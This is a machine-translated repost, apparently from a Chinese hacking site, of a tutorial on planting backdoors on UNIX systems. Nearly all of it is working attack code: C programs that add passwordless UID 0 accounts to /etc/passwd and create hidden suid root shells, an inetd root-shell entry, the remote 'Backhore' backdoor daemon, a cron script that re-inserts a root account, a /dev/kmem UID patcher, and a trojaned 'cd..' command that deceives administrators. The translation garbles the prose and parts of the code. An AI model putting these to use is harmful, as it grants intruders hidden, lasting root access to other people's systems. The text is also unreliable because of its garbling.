Create a UNIX back door for primary articles intermediate articles advanced article-vulnerability warning-the black bar safety net

ID MYHACK58:62201026187
Type myhack58
Reporter 佚名
Modified 2010-02-14T00:00:00


The primary article The most simple method, is in the password file passwd to add a UID 0 account. But the best don't do it, because as long as the system administrator to check the password file will“drain the filling”. The following is in /etc/passwd password file, add a UID 0 account C Program. <++> Trojan/backdoor1. c


main() { FILE *fd; fd=fopen("/etc/passwd","a+"); fprintf(fd,"hax0r::0:0::/root:/bin/sh\\n"); } <\ - >

Than this method is slightly hidden point is hidden in the password file in a unattended use of the account's UID to 0, and the second domain password domain set to null. Note, If you are using a higher version of*nix, and perhaps also to modify the /etc/shadow file.)

In the /tmp directory is placed under the suid shell. Later as soon as you run this program, you will easily get root user permissions. This method is almost the most popular. But there are many system every few hours, or every time you start will clear the /tmp directory of the data, in addition to some of the system is simply not allowed to run the /tmp directory of the suid program. Of course, you can modify or remove these restrictions because you are the root user, permission to modify the /var/spool/cron/crontabs/root and /etc/fstab file. The following is in the /tmp directory is placed under the suid shell program the C source program.

<++> Trojan/backdoor2. c


main() { system("cp /bin/sh /tmp/fid"); system("chown root. root /tmp/fid"); system("chmod 4 7 5 5 /tmp/fid"); } <\ - >

Intermediate article

Super Server daemon process inetd configuration file. The system administrator under normal circumstances do not often check the file, so that's a place“back door”. So here how to build one of the best back door? Of course is remote. So you do not need a local account can become the root user. First, let's look at this aspect of the basics: the inetd process is responsible for monitor various TCP and UDP ports of the connection request, and according to the connection request to start the corresponding server process. The configuration file /etc/inetd. conf very simple, basic form is as follows:

(1) (2) (3) (4) (5) (6) (7) ftp stream tcp nowait root /usr/etc/ftpd ftpd talk dgram udp wait root /usr/etc/ntalkd ntalkd mountd/1 stream rpc/tcp wait root /usr/etc/mountd mountd

1: The first column is the service name. The service name by querying /etc/services file for TCP and UDP services use of, or the portmap daemon for RPC services use the map to port number. RPC remote procedure call services by name/num name format and the third column of the rpc logo recognition. 2: The second column of the decision services used socket types: stream, dgram or raw. In General, stream for TCP services, dgram for UDP and raw use very rare. 3: The third column identifies the service using the communication Protocol. Allowed types listed in the protocols file. The Protocol is almost always tcp or udp. The RPC service on the Protocol type of the former in rpc/ it. 4: If the description of the service can handle multiple requests instead of processing one request after the exit, then the fourth column should be set to wait, so you can stop inetd continuously derive the daemon of the new copy. This option is used for processing a large number of small to service the request. If the wait is not appropriate, then in the box to fill nowait。 5: The fifth column gives the running daemon username. 6: The Sixth column gives the daemon the fully qualified path name. 7: daemon's true name and its parameters.

If you want to handle the job insignificant, such as no user interaction is required, the inetd daemon will handle yourself. At this time the sixth, the seventh column just fill in the \’internal\’. So, to install a handy Backdoor, you can select an infrequently used service, with can produce some sort of back door the daemon instead of the original daemon. For example, let it add a UID 0 account, or copy a suid shell.

A better method is that will be used to provide date and time of service daytime alternative to be able to produce a suid root shell. As long as the /etc/inetd. conf file:

daytime stream tcp nowait root internal


daytime stream tcp nowait /bin/sh sh-i.

Then restart(remember: be sure to restart inetd process:

killall -9 inetd in.

But better, more subtle method is to forge a network service, so it can be more difficult to detect in the case of We offer the back door, such as password protection and the like. If you can not pass telnetd connection of the case easily for remote access, that's great. The method is to“Own”the daemon bound to a port, the program external connections does not provide any prompt, but as long as the direct input the correct password, it is possible to smoothly into the system. The following is this the back door of a demonstration program. Note: This app is written is not very complete.)

<++> Trojan/remoteback. c /* Coders: Theft

Help from: Sector9, Halogen

Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle,halogen, Psionic, g0d, Psionic. Groups: Ethical Mutiny Crew(EMC), Common Purpose hackers(CPH), Global Hell(gH), Team Sploit, Hong Kong Danger Duo, Tg0d, EHAP. Usage: Setup:

gcc-o backhore backhore. c # ./ the backdoor password &

Run: Telnet to the host on port 4 0 0 0. After connected you Will not be prompted for a password, this way it is less Obvious, just type the password and press enter, after this You will be prompted for a command, pick 1-8.

Distributers: Ethical Mutiny Crew










define PORT 4 0 0 0

define MAXDATASIZE 1 0 0

define BACKLOG 1 0

define SA struct sockaddr

void handle(int);

int main(int argc, char argv[]) { int sockfd, new_fd, sin_size, numbytes, cmd; char ask[1 0]="Command: "; char bytes, *buf, pass[4 0]; struct sockaddr_in my_addr;

struct sockaddr_in their_addr;

printf("\\n Backhore BETA by Theft\\n"); printf(" 1: trojans rc. local\\n"); printf(" 2: sends a systemwide message\\n"); printf(" 3: binds a root shell on port 2 0 0 0\\n"); printf(" 4: creates suid sh in /tmp,\\n"); printf(" 5: creates mutiny account uid 0 no passwd\\n"); printf(" 6: drops to suid shell\\n"); printf(" 7: information on backhore\\n"); printf(" 8: contact\\n");

if (argc != 2) { fprintf(stderr,"Usage: %s password\\n", argv[0]); exit(1); }

strncpy(pass, argv[1], 4 0); printf("..using password: %s..\\n", pass);

if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); }

my_addr. sin_family = AF_INET; my_addr. sin_port = htons(PORT); my_addr. sin_addr. server_address = INADDR_ANY;

if (bind(sockfd, (SA *)&my_addr, sizeof(SA)) == -1) {

perror("bind"); exit(1); }

if (listen(sockfd, BACKLOG) == -1) { perror("listen"); exit(1); }

sin_size = sizeof(SA); while(1) { / main accept() loop / if ((new_fd = accept(sockfd, (SA )&their_addr, &sin_size)) == -1) { perror("accept"); continue; } if (! fork()) { dup2(new_fd, 0); dup2(new_fd, 1); dup2(new_fd, 2); fgets(buf, 4 0, stdin); if (! strcmp(buf, pass)) { printf("%s", ask); cmd = getchar(); handle(cmd); } close(new_fd); exit(0); } close(new_fd); while(waitpid(-1,NULL,WNOHANG) > 0); / rape the dying children */ } }

void handle(int cmd) { FILE *fd;

case \’1\’: printf("\\nBackhore BETA by Theft\\n"); printf("\\n"); printf("Trojaning rc. local\\n"); fd = fopen("/etc/passwd", "a+"); fprintf(fd, "mutiny::0:0:ethical mutiny crew:/root:/bin/sh"); fclose(fd); printf("Trojan complete.\\ n"); break; case \’2\’: printf("\\nBackhore BETA by Theft\\n"); printf("\\n"); printf("Sending systemwide message..\\n"); system("wall Box owned via the Ethical Mutiny Crew"); printf("Message sent.\\ n"); break; case \’3\’: printf("\\nBackhore BETA by Theft\\n"); printf("\\n"); printf("\\nAdding inetd backdoor... (-p)\\n"); fd = fopen("/etc/services","a+"); fprintf(fd,"backdoor\\t2000/tcp\\tbackdoor\\n"); fd = fopen("/etc/inetd. conf","a+"); fprintf(fd,"backdoor\\tstream\\ttcp\\tnowait\\troot\\t/bin/sh-i\\n"); execl("killall", "-HUP", "inetd", NULL); printf("\\ndone.\\ n"); printf("telnet to port 2 0 0 0\\n\\n"); break; case \’4\’: printf("\\nBackhore BETA by Theft\\n"); printf("\\n"); printf("\\nAdding Suid Shell... (-s)\\n"); system("cp /bin/sh /tmp/.sh"); system("chmod 4 7 0 0 /tmp/.sh"); system("chown root:root /tmp/.sh"); printf("\\nSuid shell added.\\ n"); printf("execute /tmp/. sh\\n\\n"); break; case \’5\’: printf("\\nBackhore BETA by Theft\\n"); printf("\\n"); printf("\\nAdding root account... (-u)\\n"); fd=fopen("/etc/passwd","a+"); fprintf(fd,"hax0r::0:0::/:/bin/bash\\n"); printf("\\ndone.\\ n"); printf("uid 0 and gid 0 account added\\n\\n"); break; case \’6\’: printf("\\nBackhore BETA by Theft\\n"); printf("\\n"); printf("Executing suid shell..\\n");

execl("/bin/sh"); break; case \’7\’: printf("\\nBackhore BETA by Theft\\n"); printf("\\n"); printf("\\nInfo... (-i)\\n"); printf("\\n3 - Adds entries to the /etc/services & /etc/inetd. conf giving you\\n"); printf("a root shell on port 2 0 0 0. example: telnet 2 0 0 0\\n\\n"); printf("4 - Creates a copy of /bin/sh to /tmp/.sh which, whenever\\n"); printf("executed gives you a root shell. example:/tmp/. sh\\n\\n"); printf("5 - Adds an account with uid and gid 0 to the passwd file.\\ n"); printf("The login is \’mutiny\’ and there is no passwd."); break; case \’8\’: printf("\\nBackhore BETA by Theft\\n"); printf ("\\ _blank>\\n"); printf("\\n\\n"); break; default: printf("unknown command: %d\\n", cmd); break; } } <\ - >

Senior article

The Crontab program is for a system administrator it is very useful. The Cron service is used to plan a program at a specific time, month, date, week, hour, minute run. If you're smart enough, it should be utilized to make it as we create a“back door”is! By the Cron service, you can get it in every day at 2:0 0 this time the network should be sleeping by now.) Run the back door program that enables you to easily enter the system dry do you want to do, and at the network up before you exit the system. The root user's crontab file in the /var/spool/crontab/root, and its format is as follows:

(1) (2) (3) (4) (5) (6) 0 0 * * 3 /usr/bin/updatedb

1. Minutes (0-60) 2. Hours(0-23) 3. Day (1-31) 4. Month (1-12) 5. Week (1-7) 6. The program to run

The above set the program to every Wednesday 0:0 run. To in cron to establish the back door, just in /var/spool/crontab/root to add backdoors. For example, the program can on a daily basis check our in the /etc/passwd file adds the user account is still valid. The following is the program example:

0 0 * * * /usr/bin/retract

<++> backdoor/

!/ bin/csh

set evilflag = (* grep eviluser /etc/passwd*)

if($#evilflag == 0) then

set linecount = * wc-l /etc/passwd cd cp /etc/passwd ./ temppass @ linecount[1] /= 2 @ linecount[1] += 1 split -$linecount[1] ./ temppass echo "Meb::0:0:Meb:/root:/bin/sh" >> ./ xaa cat ./ xab >> ./ xaa mv ./ xaa /etc/passwd chmod 6 4 4 /etc/passwd rm ./ xa ./ temppass echo Done... else endif <\ - >


Of course, we can write the Trojan program and put it into the /bin directory. When a specific command-line arguments the runtime will generate a suid shell. The following is the program example:

<++> Trojan/backdoor3. c


define pass "triad"


int main(argc, argv) int argc; char *argv[];{

int i=0;


if(! (strcmp(pass,argv[1]))){

system("cp /bin/csh /bin/. swp121"); system("chmod 4 7 5 5 /bin/. swp121"); system("chown root /bin/. swp121"); system("chmod 4 7 5 5 /bin/. swp121"); } }

printf("372f: Invalid control argument, unable to initialize. Retrying"); for(;i<1 0;i++){ fprintf(stderr,"."); sleep(1); } printf("\\nAction aborted after 1 0 attempts.\\ n"); return(0); } <\ - >


The following program through the memory to find you the run the program of the UID, and changing it to 0, so you have a suid root shell.

<++> Trojan/kmemthief. c








define pass "triad"

struct user userpage; long address(), userlocation;

int main(argc, argv, envp) int argc; char argv[], envp[];{

int count, fd; long where, lseek();

if(argv[1]){ if(! (strcmp(pass,argv[1]))){ fd=(open("/dev/kmem",O_RDWR);

if(fd<0){ printf("Cannot read or write to /dev/kmem\\n"); perror(argv); exit(1 0); }

userlocation=address(); where=(lseek(fd,userlocation,0);

if(where!= userlocation){ printf("Cannot seek to user page\\n"); perror(argv); exit(2 0); }

count=read(fd,&userpage,sizeof(struct user));

if(count!= sizeof(struct user)){ printf("Cannot read user page\\n"); perror(argv); exit(3 0); }

printf("Current UID: %d\\n",userpage. u_ruid); printf("Current GID: %d\\n",userpage. g_ruid);

userpage. u_ruid=0; userpage. u_rgid=0;


if(where!= userlocation){ printf("Cannot seek to user page\\n"); perror(argv); exit(4 0); }

write(fd,&userpage,((char )&(userpage. u_procp))-((char )&userpage));

execle("/bin/csh","/bin/csh","-i",(char *)0, envp); } }

} <\ - >


Have you ever tried it on a UNIX system under the wrong to put "cd .." enter "cd.."do? This is due to the use of MS Windows and MS-DOS develop the habit. This error the network whether it be committed? If so, can you let him do for us the point of“contribution”? For example, when he typed "cd..", it will activate our Trojan. So we don't have to login to the system to activate the Trojan. The following is the program example:

<++> Trojan/dumb. c / This program is available in the administrator accidentally enter cd.. to the /etc/passwd file to add a UID 0 account. But at the same time it also achieve cd .. function, and thus to fool an administrator. /



main() { FILE *fd; fd=fopen("/etc/passwd","a+"); fprintf(fd,"hax0r::0:0::/root:/bin/sh\\n"); system("cd"); } <\ - >